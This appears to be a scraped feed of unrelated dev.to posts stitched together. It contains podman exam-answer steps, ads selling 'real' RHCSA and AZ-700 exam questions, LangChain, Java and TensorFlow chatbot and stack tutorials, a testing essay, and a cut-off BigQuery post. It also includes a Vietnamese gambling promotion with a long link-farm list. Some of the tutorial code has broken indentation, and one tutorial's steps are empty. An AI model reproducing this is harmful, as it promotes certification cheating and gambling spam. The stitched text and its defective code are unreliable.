**Question # 4** — Part 1 (on Node1 Server), Task 15 [Running Containers]: Create a container named logserver with the image rhel8/rsyslog found in the registry registry.domain15.example.com:5000. The container should run as the rootless user shangrila (use redhat as the password [sudo user]). Configure the container with systemd services as the shangrila user using the service name “container-logserver” so that it persists across reboots. Use admin as the username and admin123 as the credentials for the image registry.

Answer (see the explanation below):

```
[root@workstation ~]# ssh shangrila@node1
[shangrila@node1 ~]$ podman login registry.domain15.example.com:5000
Username: admin
Password:
Login Succeeded!
```



```
[shangrila@node1 ~]$ podman pull registry.domain15.example.com:5000/rhel8/rsyslog
[shangrila@node1 ~]$ podman run -d --name logserver registry.domain15.example.com:5000/rhel8/rsyslog
021b26669f39cc42b8e94eab886ba8293d6247bf68e4b0d76db2874aef284d6d
[shangrila@node1 ~]$ mkdir -p ~/.config/systemd/user
[shangrila@node1 ~]$ cd ~/.config/systemd/user
[shangrila@node1 user]$ podman generate systemd --name logserver --files --new
/home/shangrila/.config/systemd/user/container-logserver.service
[shangrila@node1 ~]$ systemctl --user daemon-reload
[shangrila@node1 user]$ systemctl --user enable --now container-logserver.service
[shangrila@node1 ~]$ podman ps
CONTAINER ID  IMAGE                                                    COMMAND          CREATED        STATUS  PORTS  NAMES
7d9f7a8a4d63  registry.domain15.example.com:5000/rhel8/rsyslog:latest  /bin/rsyslog.sh  2 seconds ago                 logserver
[shangrila@node1 ~]$ sudo reboot
[shangrila@node1 ~]$ cd .config/systemd/user
[shangrila@node1 user]$ systemctl --user status
```

**Question # 5** — There is a server having 172.24.254.254 and 172.25.254.254. Your system lies on 172.24.0.0/16. Make a successful ping to 172.25.2
https://www.certifiedumps.com/redhat/ex200-dumps.html
Test-drive a free RedHat EX200 questions demo now and put any lingering doubts to rest.
CertifiesDumps offers the most recent EX200 questions in all three formats. In addition, we keep you updated with free EX200 exam question updates for up to 90 days. CertifiesDumps is committed to customer satisfaction, reflected in the free demos offered for our EX200 PDF questions and practice exams. Before making a purchase, you can download a free demo of the RHCSA EX200 prep material and validate its authenticity. Don't wait; jump-start your preparation for the EX200 exam today. Best of luck!
Your Top Picks: Refreshed EX200 Dumps for 2024/2025 Prep
Earning the Red Hat Certified System Administrator (RHCSA) accreditation is no small feat. As part of your preparation for this crucial certification, one of the most important tasks you have is to familiarize yourself with the up-to-date exam questions or dumps, often referred to as EX200 dumps.
Relevant keywords: EX200 dumps (exam questions) 2024 | EX200 questions (exam dumps) 2K24 | EX200 exam dumps | EX200 exam questions | EX200 exam promo code
TO GET INFO ON THIS : ❗ https://www.certifiedumps.com/redhat/ex200-dumps.html 💯 | ella_henry_990efd16d535c5 | |
1,917,833 | latest Microsoft AZ-700 Questions - Right Path for Your Career | CertifieDumpds is one of the best brands in the market that offers updated & accurate exam... | 0 | 2024-07-09T22:04:44 | https://dev.to/ella_henry_990efd16d535c5/latest-microsoft-az-700-questions-right-path-for-your-career-4l7f |

CertifieDumps is one of the best brands in the market offering updated & accurate exam preparation material for the certification exam. If you are looking for certification exam preparation material, you do not need to worry any more; just stay on our site. We make sure we have the best deal for your exam preparation material, containing realistic exam questions to ensure you pass.
We cover almost all types of exam preparation material. Experienced and certified subject specialists prepare our certification exam questions. The AZ-700 exam (Designing and Implementing Microsoft Azure Networking Solutions) is a certification designed to equip professionals with the specialized skills needed to plan, implement, and maintain Azure networking solutions. This comprehensive exam is an ideal stepping stone for individuals seeking to become Azure network engineers.
To pass the AZ-700 Exam, candidates must have a strong understanding of Azure concepts and technologies, including Azure infrastructure, Azure resource management, Azure identity, Azure governance, and Azure security. The exam consists of a series of multiple-choice and performance-based questions that test the candidate's knowledge of Azure concepts and their ability to apply that knowledge to real-world scenarios. Upon successfully passing the AZ-700 Exam, individuals will earn the Microsoft Certified: Azure Network Engineer Associate certification, demonstrating their expertise in designing and implementing Azure networking solutions. Overall, the AZ-700 Exam is a valuable certification for individuals looking to advance their careers in cloud computing, particularly in the field of Azure networking.
FOR MORE : https://www.certifiedumps.com/microsoft/az-700-dumps.html
Trust CertifieDumps with IT Exams and you are Trusting the Best
Get unlimited access to 600+ IT Exams and Pass the Exams according to your Requirements
Explore a variety of Fresh Topics
Get Regular Free Updates to All Exams until you have Access
Secure IT Jobs after Passing the Certifications
Microsoft AZ-700 Exam Information:
Vendor: Microsoft
Exam Code: AZ-700
Exam Name: AZ-700 Designing and Implementing Microsoft
Certification Name: Bundle pack includes
Number of Questions: 30
Start free online test engine
Exam Format: MCQs
Exam Language: English
Why CertifieDumps exam preparation materials are the best?
Free PDF and Exam Software Demos
CertifieDumps offers practice exam questions, valid preparation material in three effective formats PDF (all device types and OS supported), Desktop Practice Test Software, and Web-Based Practice Exam. We also offer a free demo which allows you to check every feature of our exam preparation material before the purchase.
Get Special Discount Offer | Extra 25% Off - Instant Download AZ-700
Exam Questions: AZ-700 Designing and Implementing Microsoft Azure Networking Solutions Exam
Is there a guarantee that me passing the exam?
Of course. Our questions and answers will let you pass the real exam. If this material cannot do it, then probably nothing else can.
Certifiedumps Microsoft AZ-700 PDF Dumps File and Practice Test Software:
Certifiedumps is a trusted platform offering real and updated Channel Partner Program AZ-700 exam practice questions in three different formats: PDF question files, desktop practice test software, and web-based practice test software. All three formats are easy to use and compatible with all devices, operating systems, and web browsers. The Certifiedumps AZ-700 PDF dumps file contains real, valid, and verified AZ-700 exam questions, designed and verified by AZ-700 certification exam trainers who work together to ensure its top standard. You can install it on your desktop computer, laptop, tablet, or even smartphone and start preparation anywhere and anytime. As for the desktop and web-based practice test software, both are mock AZ-700 exams that give you a real-time exam environment for preparation. Good luck with the AZ-700 exam and your career!
Exam Duration: 90 minutes
1,917,834 | Klein Bottle | Check out this Pen I made! | 0 | 2024-07-09T22:08:48 | https://dev.to/dan52242644dan/klein-bottle-3haf | codepen, ai, html, javascript | Check out this Pen I made!
{% codepen https://codepen.io/Dancodepen-io/pen/rNEaxrz %} | dan52242644dan |
1,917,836 | Build Generative AI Chatbot | Introduction In this article, you will learn how to build a generative AI chatbot that... | 0 | 2024-07-09T22:15:23 | https://dev.to/jhonnyarm/build-generative-ai-chatbot-4epc | gradio, openapi, sqlalchemy, langchain | ## Introduction
In this article, you will learn how to build a generative AI chatbot that leverages OpenAI's GPT-3.5 to provide personalized and accurate responses to user queries. By integrating a pretrained LLM with a dynamic SQLite database, you'll create an intelligent chatbot capable of handling domain-specific questions. This tutorial will cover setting up the environment, configuring the AI model, and building an interactive user interface using Gradio.
### Why Use Generative AI in Chatbots?
Using Generative AI in chatbots offers several key advantages, including:
#### Personalized Responses:
Generative AI enables chatbots to generate responses that are tailored and relevant to each user's specific queries, leading to a more engaging and satisfying user experience.
#### Natural Language Understanding:
Generative AI models like GPT-3.5 have advanced natural language understanding capabilities, allowing the chatbot to comprehend complex queries and provide accurate answers.
#### Contextual Awareness:
These AI models can maintain context across interactions, which helps in providing coherent and contextually appropriate responses even in multi-turn conversations.
## Requirements
To successfully build and deploy this generative AI chatbot, you should have a basic understanding or knowledge of the following:
- Basic understanding of Large Language Models (LLMs) and how they can be applied to natural language processing tasks.
- Basic knowledge of Python programming, including working with libraries and writing scripts.
- Familiarity with how to use APIs, including making requests and handling responses.
### Tools and Technologies
- OpenAI GPT-3.5: Used for interpreting natural language queries and generating SQL queries.
- LangChain: Facilitates integration with OpenAI and helps create SQL agents.
- SQLAlchemy: Manages database interactions and operations.
- Pandas: Handles reading and processing of Excel files.
- Gradio: Creates interactive user interfaces.
- SQLite: Acts as the database to store and query data.
- Dotenv: Loads environment variables from a .env file.
## Flow diagram
The following diagram illustrates how this chatbot operates.

### Project Setup
- Create requirements.txt and copy the following code.
```bash
openai==0.27.0
langchain==0.0.152
sqlalchemy==1.4.41
pandas==1.4.3
gradio==2.7.5
python-dotenv==0.20.0
```
- Install Dependencies: Using requirements.txt.
```bash
pip install -r requirements.txt
```
- Create the .env File:
```bash
OPENAI_API_KEY=OPENAI-TOKEN-HERE
OPENAI_API_BASE=https://api.openai.com/v1
```
Replace OPENAI-TOKEN-HERE with your actual API key obtained from OpenAI.
- Create a file called "app"
```python
import os
import gradio as gr
from langchain_community.chat_models import ChatOpenAI
from langchain_community.agent_toolkits.sql.base import create_sql_agent
from langchain_community.utilities import SQLDatabase
from langchain_community.tools import Tool
from langchain.memory import ConversationBufferMemory
from dotenv import load_dotenv
from sqlalchemy import create_engine, inspect, text
from loader import create_demand_table
# Load environment variables
load_dotenv()
# Configure the language model with OpenAI directly
llm = ChatOpenAI(
api_key=os.getenv("OPENAI_API_KEY"),
model_name="gpt-3.5-turbo-0125",
temperature=0.1,
)
# Initialize the database engine
engine = create_engine('sqlite:///db.sqlite3', echo=True)
# Function to process the uploaded file and create a table
def process_file(file):
db = create_demand_table(engine, 'dynamic_table', file.name)
return db
# Define a function to execute SQL queries
def run_sql_query(query):
with engine.connect() as connection:
result = connection.execute(text(query))
return [dict(row) for row in result]
# Create a tool that executes SQL queries
sql_tool = Tool(
name="SQLDatabaseTool",
func=run_sql_query,
description="Tool for executing SQL queries on the database."
)
# Configure the conversational agent's memory
memory = ConversationBufferMemory(memory_key="chat_history", return_messages=True)
# Function to handle user queries and process them with the SQL tool
def query_fn(input_text, file):
db = process_file(file)
conversational_agent = create_sql_agent(
llm=llm,
db=db,
tools=[sql_tool],
memory=memory,
verbose=True,
dialect='ansi',
early_stopping_method="generate",
handle_parsing_errors=True,
)
response = conversational_agent.run(input=input_text)
# Check if the response is a list and contains valid data
if isinstance(response, list) and len(response) > 0:
# Convert each row of the result into a string
result_text = ', '.join([str(row) for row in response])
elif isinstance(response, str):
# If the response is a string, use it directly
result_text = response
else:
result_text = "No data found for the query."
return {"result": result_text}
# Set up the user interface with Gradio
iface = gr.Interface(
fn=query_fn,
inputs=[gr.Textbox(label="Enter your query"), gr.File(label="Upload Excel file")],
outputs=gr.JSON(label="Query Result"),
title="Domain-specific chatbot"
)
# Launch the application
iface.launch(share=False, server_port=8080)
```
- Create a file called "loader"
```python
import pandas as pd
from sqlalchemy import Table, Column, Integer, String, Date, MetaData
from sqlalchemy.orm import sessionmaker
from langchain_community.utilities import SQLDatabase
def create_demand_table(engine, table_name, excel_file):
    # Read the Excel file
    df = pd.read_excel(excel_file)
    metadata = MetaData()
# Map pandas data types to SQLAlchemy data types
dtype_mapping = {
'object': String,
'int64': Integer,
'float64': Integer,
'datetime64[ns]': Date,
}
# Dynamically define the table structure
columns = []
if 'ID' not in df.columns:
columns.append(Column('id', Integer, primary_key=True, autoincrement=True))
for col_name, dtype in df.dtypes.items():
col_type = dtype_mapping.get(str(dtype), String)
columns.append(Column(col_name, col_type))
# Dynamically create the table
demand_table = Table(table_name, metadata, *columns)
# Drop the existing table in the SQLite database, if it exists
metadata.drop_all(engine, [demand_table])
# Create the table in the SQLite database
metadata.create_all(engine)
# Create a session to interact with the database
Session = sessionmaker(bind=engine)
with Session() as session:
# Insert data into the table
df.to_sql(table_name, con=engine, if_exists='append', index=False)
db = SQLDatabase(engine)
return db
```
### Running the Application
To run the application use the following code.
```
python app.py
```
This command will start the server, and you can interact with the chatbot through the provided Gradio interface. In the console, you will see the URL where you can access your chatbot.

#### Gradio Interface
The generated interface consists of three parts:
- Query Input Box: This is where you enter your queries in natural language.
- File Upload Box: This is where you upload your Excel files.
- Result Display Area: This is where the results of your queries will be displayed.

#### Conclusion:
AI in chatbots enhances user interactions with personalized responses and advanced natural language understanding, ensuring more engaging and contextually relevant conversations.
| jhonnyarm |
1,917,856 | Bet88 - Link Truy Cập Nhà Cái BET88 Chính Thức - Uy Tín | Bet88 - Nhà cái cá cược trực tuyến an toàn⭐️đa dạng sản phẩm cá cược: Casino, Thể Thao ⭐️ Đăng ký... | 0 | 2024-07-09T22:23:24 | https://dev.to/bet88how/bet88-link-truy-cap-nha-cai-bet88-chinh-thuc-uy-tin-eob | Bet88 - Nhà cái cá cược trực tuyến an toàn⭐️đa dạng sản phẩm cá cược: Casino, Thể Thao ⭐️ Đăng ký ngay để nhận 199k miễn phí!
Địa chỉ: 235 Đồng Khởi, Phường Bến Nghé, Quận 1, TPHCM
SĐT: 093.222.9536
Email: bet88how@gmail.com
#bet88 #bet88how #bet88casino https://bet88.how/
https://www.spigotmc.org/members/bet88how.2069225/
https://gravatar.com/bet88how
https://www.diigo.com/profile/bet88how
https://influence.co/bet88how
https://disqus.com/by/disqus_tCHzEuXijn/about/
https://hub.docker.com/u/bet88how
https://sketchfab.com/bet88how
https://topsitenet.com/profile/bet88how/1225202/
https://www.slideserve.com/bet88how
http://freestyler.ws/user/463540/bet88how
https://ko-fi.com/bet88how
https://www.youtube.com/@bet88how
https://www.twitch.tv/bet88how/about
https://www.pinterest.com/bet88how/
https://github.com/bet88how
https://about.me/bet88how
https://x.com/bet88how
https://issuu.com/bet88how
https://www.instapaper.com/read/1692666375
https://www.linkedin.com/in/bet88how/
http://hawkee.com/profile/7260402/
https://www.openstreetmap.org/user/bet88how
https://soundcloud.com/bet88how
https://www.gta5-mods.com/users/bet88how
https://www.reddit.com/user/bet88how/
https://www.tumblr.com/bet88how
https://500px.com/p/bet88how?view=photos
https://batocomic.com/u/2092423-bet88howbet88how
https://wakelet.com/wake/Wf94AFc-lCwiSvETGOE1Y
https://ioby.org/users/bet88how858838
https://www.discogs.com/fr/user/bet88how
https://tvchrist.ning.com/profile/Bet88184
https://www.walkscore.com/people/170636775130/bet88how
https://my.archdaily.com/us/@bet88-55
https://hto.to/u/2092423-bet88howbet88how
https://wakelet.com/@bet88how
https://forum.acronis.com/user/679031
https://chart-studio.plotly.com/~bet88how
https://community.windy.com/user/bet88how
https://mangatoto.com/u/2092423-bet88howbet88how
https://pubhtml5.com/homepage/fnrwb/
https://audiomack.com/bet88how
https://pbase.com/bet88how/profile
https://mangatoto.net/u/2092423-bet88howbet88how
https://www.blogger.com/profile/14762074455554178367
https://www.mixcloud.com/bet88how/
https://www.ameba.jp/profile/general/bet88how/
https://mto.to/u/2092423-bet88howbet88how
https://dto.to/u/2092423-bet88howbet88how
https://www.pearltrees.com/bet88how
https://batotoo.com/u/2092423-bet88howbet88how
https://bet88how.blogspot.com/2024/07/bet88-link-truy-cap-nha-cai-bet88-chinh.html
https://original.misterpoll.com/users/5481135
https://www.plurk.com/bet88how
https://profile.hatena.ne.jp/bet88how/profile
https://www.reverbnation.com/artist/bet88how
https://tapas.io/bet88how
https://www.designspiration.com/bet88how/
http://banhkeo.sangnhuong.com/member.php?u=89777
https://tupalo.com/en/users/6996452
https://hashnode.com/@bet88how
https://comiko.net/u/2092423-bet88howbet88how
https://skitterphoto.com/photographers/102334/bet88how
https://www.fitday.com/fitness/forums/members/bet88how.html
https://bato.to/u/2092423-bet88howbet88how
https://www.speedrun.com/users/bet88how
https://www.longisland.com/profile/bet88how
https://zbato.org/u/2092423-bet88howbet88how
https://postheaven.net/hz0pk538os
https://start.me/p/qbM4ro/trang-b-t-d-u
https://writeablog.net/2o062qlz4o
https://readtoto.net/u/2092423-bet88howbet88how
https://newspicks.com/user/10461975
https://mangatoto.org/u/2092423-bet88howbet88how
https://allmylinks.com/bet88how
https://booklog.jp/users/bet88how/profile
https://taplink.cc/bet88how
https://www.anobii.com/en/016af771d644eb8f74/profile/activity
https://forums.alliedmods.net/member.php?u=377438
https://beacons.ai/bet88how
https://community.articulate.com/users/Bet88How
https://qiita.com/bet88how
https://www.credly.com/users/bet88how/badges
https://yoo.rs/@bet88how
https://heylink.me/bet88how/
https://myanimelist.net/profile/bet88how
https://leetcode.com/u/bet88how/
https://www.furaffinity.net/user/bet88how/
https://vocal.media/authors/bet88-link-truy-cap-nha-cai-be-t88-chinh-thuc-uy-tin
https://www.intensedebate.com/people/bet88howvn | bet88how | |
1,917,857 | Case Study: Evaluating Expressions | Stacks can be used to evaluate expressions. Stacks and queues have many applications. This section... | 0 | 2024-07-09T22:26:22 | https://dev.to/paulike/case-study-evaluating-expressions-1bgg | java, programming, learning, beginners | Stacks can be used to evaluate expressions. Stacks and queues have many applications. This section gives an application that uses stacks to evaluate expressions. You can enter an arithmetic expression in Google to evaluate it, as shown in the figure below.

How does Google evaluate an expression? This section presents a program that evaluates a _compound expression_ with multiple operators and parentheses (e.g., **(15 + 2) * 34 – 2**). For simplicity, assume that the operands are integers and the operators are of four types: **+**, **-**, *****, and **/**.
The problem can be solved using two stacks, named **operandStack** and **operatorStack**, for storing operands and operators, respectively. Operands and operators are pushed into the stacks before they are processed. When an _operator is processed_, it is popped from **operatorStack** and applied to the first two operands from **operandStack** (the two operands are popped from **operandStack**). The resultant value is pushed back to **operandStack**.
The algorithm proceeds in two phases:
## Phase 1: Scanning the expression
The program scans the expression from left to right to extract operands, operators, and the parentheses.
1. If the extracted item is an operand, push it to **operandStack**.
2. If the extracted item is a **+** or **-** operator, process all the operators at the top of **operatorStack** and push the extracted operator to **operatorStack**.
3. If the extracted item is a ***** or **/** operator, process the ***** or **/** operators at the top of **operatorStack** and push the extracted operator to **operatorStack**.
4. If the extracted item is a **(** symbol, push it to **operatorStack**.
5. If the extracted item is a **)** symbol, repeatedly process the operators from the top of **operatorStack** until seeing the **(** symbol on the stack.
## Phase 2: Clearing the stack
Repeatedly process the operators from the top of **operatorStack** until **operatorStack** is empty.
Table below shows how the algorithm is applied to evaluate the expression **(1 + 2) * 4 - 3**.

The code below gives the program, and Figure below shows some sample output.

```
package demo;
import java.util.Stack;
public class EvaluateExpression {
public static void main(String[] args) {
// Check number of arguments passed
if(args.length != 1) {
System.out.println("Usage: java EvaluateExpression \"expression\"");
System.exit(1);
}
try {
System.out.println(evaluateExpression(args[0]));
}
catch(Exception ex) {
System.out.println("Wrong expression: " + args[0]);
}
}
/** Evaluate an expression */
public static int evaluateExpression(String expression) {
// Create operandStack to store operands
Stack<Integer> operandStack = new Stack<>();
// Create operatorStack to store operators
Stack<Character> operatorStack = new Stack<>();
// Insert blanks around (, ), +, -, /, and *
expression = insertBlanks(expression);
// Extract operands and operators
String[] tokens = expression.split(" ");
// Phase 1: Scan tokens
for(String token: tokens) {
if(token.length() == 0) // Blank space
continue; // Back to the while loop to extract the next token
else if(token.charAt(0) == '+' || token.charAt(0) == '-') {
// Process all +, -, *, / in the top of the operator stack
while(!operatorStack.isEmpty() && (operatorStack.peek() == '+' || operatorStack.peek() == '-' || operatorStack.peek() == '*' || operatorStack.peek() == '/')) {
processAnOperator(operandStack, operatorStack);
}
// Push the + or - operator into the operator stack
operatorStack.push(token.charAt(0));
}
else if(token.charAt(0) == '*' || token.charAt(0) == '/') {
// Process all *, / in the top of the operator stack
while(!operatorStack.isEmpty() && (operatorStack.peek() == '*' || operatorStack.peek() == '/')) {
processAnOperator(operandStack, operatorStack);
}
// Push the * or / operator into the operator stack
operatorStack.push(token.charAt(0));
}
else if(token.trim().charAt(0) == '(') {
operatorStack.push('('); // Push '(' to stack
}
else if(token.trim().charAt(0) == ')') {
// Process all the operators in the stack until seeing '('
while(operatorStack.peek() != '(') {
processAnOperator(operandStack, operatorStack);
}
operatorStack.pop(); // Pop the '(' symbol from the stack
}
else {
// Push an operand to the stack
operandStack.push(Integer.valueOf(token));
}
}
// Phase 2: Process all the remaining operators in the stack
while(!operatorStack.isEmpty()) {
processAnOperator(operandStack, operatorStack);
}
// Return the result
return operandStack.pop();
}
/** Process one operator: Take an operator from operatorStack and apply it on the operands in the operandStack */
public static void processAnOperator(Stack<Integer> operandStack, Stack<Character> operatorStack) {
char op = operatorStack.pop();
int op1 = operandStack.pop();
int op2 = operandStack.pop();
if(op == '+')
operandStack.push(op2 + op1);
else if(op == '-')
operandStack.push(op2 - op1);
else if(op == '*')
operandStack.push(op2 * op1);
else if(op == '/')
operandStack.push(op2 / op1);
}
public static String insertBlanks(String s) {
String result = "";
for(int i = 0; i < s.length(); i++) {
if(s.charAt(i) == '(' || s.charAt(i) == ')' || s.charAt(i) == '+' || s.charAt(i) == '-' || s.charAt(i) == '*' || s.charAt(i) == '/')
result += " " + s.charAt(i) + " ";
else
result += s.charAt(i);
}
return result;
}
}
```
You can use the **GenericStack** class provided by the book or the **java.util.Stack** class defined in the Java API for creating stacks. This example uses the **java.util.Stack** class. The program will still work if **java.util.Stack** is replaced by **GenericStack**.
The program takes an expression as a command-line argument in one string.
The **evaluateExpression** method creates two stacks, **operandStack** and **operatorStack** (lines 24, 27), and extracts operands, operators, and parentheses delimited by space (lines 30–33). The **insertBlanks** method is used to ensure that operands, operators, and parentheses are separated by at least one blank (line 30).
The program scans each token in the **for** loop (lines 36–72). If a token is empty, it is skipped (line 38). If a token is an operand, push it to **operandStack** (line 70). If a token is a **+** or **-** operator (line 39), process all the operators from the top of **operatorStack**, if any (lines 41–43), and push the newly scanned operator into the stack (line 46). If a token is a ***** or **/** operator (line 48), process all the ***** and **/** operators from the top of **operatorStack**, if any (lines 50–51), and push the newly scanned operator to the stack (line 55). If a token is a **(** symbol (line 57), push it into **operatorStack**. If a token is a **)** symbol (line 60), process all the operators from the top of **operatorStack** until seeing the **(** symbol (lines 62–64) and pop the **(** symbol from the stack.
After all tokens are considered, the program processes the remaining operators in **operatorStack** (lines 75–77).
The **processAnOperator** method (lines 84–96) processes an operator. The method pops the operator from **operatorStack** (line 85) and pops two operands from **operandStack** (lines 86–87). Depending on the operator, the method performs an operation and pushes the result of the operation back to **operandStack** (lines 89, 91, 93, 95).
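For readers who want the essence of the two-stack algorithm without the Java scaffolding, here is a compact Python sketch of the same evaluation scheme (illustrative only; like the Java version, it assumes non-negative integer operands and truncating integer division):

```python
import re

def evaluate(expression):
    """Two-stack (operand/operator) evaluation of +, -, *, / and parentheses."""
    operands, operators = [], []
    precedence = {'+': 1, '-': 1, '*': 2, '/': 2}

    def apply_top():
        # Pop one operator and two operands, push the result back
        op = operators.pop()
        right, left = operands.pop(), operands.pop()
        operands.append({'+': left + right, '-': left - right,
                         '*': left * right, '/': left // right}[op])

    for token in re.findall(r'\d+|[-+*/()]', expression):
        if token.isdigit():                       # operand
            operands.append(int(token))
        elif token == '(':                        # opening parenthesis
            operators.append(token)
        elif token == ')':                        # unwind back to '('
            while operators[-1] != '(':
                apply_top()
            operators.pop()                       # discard the '('
        else:                                     # + - * /
            while (operators and operators[-1] != '('
                   and precedence[operators[-1]] >= precedence[token]):
                apply_top()
            operators.append(token)

    while operators:                              # Phase 2: drain the stack
        apply_top()
    return operands.pop()

print(evaluate("(1 + 2) * 4 - 3"))  # -> 9
```

The precedence table plays the role of the hard-coded `+/-` versus `*//` checks in the Java listing.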
| paulike |
1,917,858 | It shouldn't be so simple to introduce a bug into your application, and I'll tell you why | Who has never heard that story (fictional or not) about the junior dev who wiped the database in... | 0 | 2024-07-09T22:33:58 | https://dev.to/ramonborges15/nao-deveria-ser-tao-simples-inserir-um-bug-na-sua-aplicacao-e-eu-te-conto-o-porque-902 | beginners, testing, career, developers | Who has never heard that story (fictional or not) about the junior dev who wiped the production database? Or how many of us, while implementing that new improvement, introduced a bug into the application without noticing? Usually, our first reaction is to blame either the person (when they make the mistake) or ourselves (when we do).
Introducing a bug into a system, or even wiping production data, should not be such simple tasks to pull off (you must agree with me, right?). But why does this happen?
### People and Processes
I believe the answer to this question starts with understanding that **most of these mistakes are first and foremost a failure of process, not of people**. Looking at failures from this point of view helps us a lot in finding the real cause of the error and avoiding it (or at least reducing it) in the future.
In the book "The Lean Startup", Eric Ries makes a very interesting statement:
> *If our production process is so fragile that you can break it on your very first day of work, shame on us for making it so easy.*
>
In other words, **it should not be so simple to introduce a bug into my application!**
### Don't cry over spilled milk, write tests!
Okay Ramon, I get it: it can't be that easy. But is there a way I can make it harder for my "future self", or even a colleague, to make the same mistake? Yes! And one of those ways would be: **writing tests for your application!**
The desire and urgency to fix that bug should be matched by the urgency to keep the next person from repeating the mistake. When we add tests to the application, we are in some way protecting our own work as well as our colleagues'. In other words, we are **making the process of introducing bugs harder**.
Whenever a new bug is discovered in the application, we can create a specific test to detect it. That way, as we add more tests, our system becomes progressively more robust and less susceptible to errors. Did you notice how much more productive this is than just criticizing the person, or even yourself?
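To make the idea concrete, here is a minimal, hypothetical sketch (all names invented) of a regression test written right after fixing a bug where a discount calculation could go negative:

```python
def apply_discount(price, discount_pct):
    """Fixed version: a discount can never push the price below zero."""
    discounted = price * (1 - discount_pct / 100)
    return max(discounted, 0.0)

# Regression test created when the bug was found:
# discounts above 100% used to produce negative prices.
def test_discount_never_goes_negative():
    assert apply_discount(100.0, 150) == 0.0

# And a test guaranteeing the normal behavior still works.
def test_regular_discount_still_works():
    assert apply_discount(200.0, 25) == 150.0
```

Every bug that gets its own test like this becomes a bug that cannot silently come back.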
## Conclusion
Seeing mistakes as opportunities to improve the development process allows us to identify their real causes and implement effective solutions. Writing tests is one of the powerful strategies for making the system more robust and resilient to new bugs, continuously strengthening the software development process.
## References
- The book "The Lean Startup: How Today's Entrepreneurs Use Continuous Innovation to Create Radically Successful Businesses" by Eric Ries. | ramonborges15 |
1,917,859 | Efficiency of Data Structure | Data structures are the fundamental components of computer programming, enabling efficient data... | 0 | 2024-07-10T04:16:45 | https://dev.to/brightpatani/data-structure-145a | Data structures are the fundamental components of computer programming, enabling efficient data organization, storage, and manipulation. In this post, we will dive into the world of data structures, their types, and their importance in programming.
**Data Structures vs. Data Types**
Many programmers struggle to understand the differences between data structures and data types. Data types define individual pieces of data, whereas data structures define how multiple values are organized and stored. This distinction is crucial, as it allows programmers to choose the appropriate data structure for their specific needs.
**Linear and Non-Linear Data Structures**
Linear data structures, such as arrays and linked lists, arrange elements sequentially. Non-linear data structures, like trees and graphs, don't follow a sequential arrangement. Each type has its strengths and weaknesses, making them suitable for different tasks.
**Arrays and Linked Lists**
Arrays store elements in contiguous memory locations, enabling fast access by position. Linked lists, on the other hand, use pointers to connect nodes, allowing for easy insertion and deletion.
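A tiny Python sketch of the difference (illustrative only):

```python
# Array-style structure: contiguous storage, fast positional access
scores = [10, 20, 30]
print(scores[1])  # -> 20

# Linked list: each node just points to the next one
class Node:
    def __init__(self, value, next=None):
        self.value = value
        self.next = next

head = Node(10, Node(30))
# Insert 20 between the two nodes without shifting anything
head.next = Node(20, head.next)
print(head.next.value)  # -> 20
```

Note how the linked-list insertion only rewires one pointer, while inserting into the middle of an array would shift every later element.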
**Stacks and Queues**
Stacks follow the Last In First Out (LIFO) order, while queues follow the First In First Out (FIFO) order. These data structures are essential for managing data in a specific order.
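In Python, both orders can be sketched in a few lines (a plain list works as a stack, and `collections.deque` as a queue):

```python
from collections import deque

stack = []            # LIFO: last in, first out
stack.append('a')
stack.append('b')
assert stack.pop() == 'b'      # the most recent item leaves first

queue = deque()       # FIFO: first in, first out
queue.append('a')
queue.append('b')
assert queue.popleft() == 'a'  # the oldest item leaves first
```

`deque` is used for the queue because `popleft()` is constant time, while `list.pop(0)` has to shift every remaining element.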
**Trees and Graphs**
Trees are hierarchical data structures with nodes connected by edges. Graphs consist of vertices connected by edges, solving complex programming problems.
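As a small illustration, a graph can be stored as an adjacency list, and a breadth-first search answers "what can I reach from here?":

```python
from collections import deque

# A graph as an adjacency list: each vertex mapped to its neighbors
graph = {'A': ['B', 'C'], 'B': ['D'], 'C': ['D'], 'D': []}

def reachable(graph, start):
    """Breadth-first search: the set of vertices reachable from start."""
    seen, frontier = {start}, deque([start])
    while frontier:
        vertex = frontier.popleft()
        for neighbor in graph[vertex]:
            if neighbor not in seen:
                seen.add(neighbor)
                frontier.append(neighbor)
    return seen

print(reachable(graph, 'A'))  # -> {'A', 'B', 'C', 'D'}
```

The same traversal idea, applied to a tree (a graph with no cycles), underlies many of the "complex programming problems" these structures solve.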
**Importance of Data Structures**
Data structures are essential for two main reasons: they make code more efficient, and they make it easier to understand. Other benefits include:
- Enable efficient data storage and retrieval
- Allow for scalable software development
- Provide a framework for solving complex problems
- Help programmers write more efficient and effective code | brightpatani | |
1,917,860 | Creating a Simple Generative AI Chatbot with Python and TensorFlow | Introduction: In this article, we'll walk through the process of creating a basic generative AI... | 0 | 2024-07-09T22:33:39 | https://dev.to/csar_fabinchvezlinar/creating-a-simple-generative-ai-chatbot-with-python-and-tensorflow-13mc | **Introduction:**
In this article, we'll walk through the process of creating a basic generative AI chatbot using Python and TensorFlow. This chatbot will be capable of generating responses based on input text, showcasing the fundamentals of natural language processing and neural networks.
**Prerequisites:**
- Basic knowledge of Python
- Familiarity with neural network concepts
- Python 3.7 or later installed
- TensorFlow 2.x installed
**Step 1: Setting Up the Environment**
First, ensure you have the necessary libraries installed:

**Step 2: Preparing the Data**
We'll use a simple dataset for this example. Create a file named 'conversations.txt' with some sample dialogue:

**Step 3: Preprocessing the Data**
Now, let's preprocess our data:

**Step 4: Building the Model**
Let's create a simple sequence-to-sequence model:

**Step 5: Training the Model**
Now, let's train our model:

**Step 6: Using the Chatbot**
Finally, let's create a function to generate responses:

**Conclusion:**
This article demonstrates how to create a simple generative AI chatbot using Python and TensorFlow. While this example is basic, it provides a foundation for more complex chatbot implementations. Future improvements could include using larger datasets, implementing attention mechanisms, or exploring more advanced architectures like transformers.
Remember, creating **AI** models requires **ethical considerations** and responsible use. Always ensure your **chatbot** is designed to be helpful and not harmful. | csar_fabinchvezlinar | |
1,917,861 | BigQuery Schema Generation Made Easier with PyPI’s bigquery-schema-generator | When importing data into BigQuery, a crucial step is defining the table's structure - its schema.... | 0 | 2024-07-09T22:35:35 | https://dev.to/noela_tenku/bigquery-schema-generation-made-easier-with-pypis-bigquery-schema-generator-3iej | data, dataengineering, bigquery, python | When importing data into BigQuery, a crucial step is defining the table's structure - its schema. This schema can be auto-detected or defined manually.
### Auto-Detection with BigQuery’s LoadJobConfig Method (for Smaller Datasets)
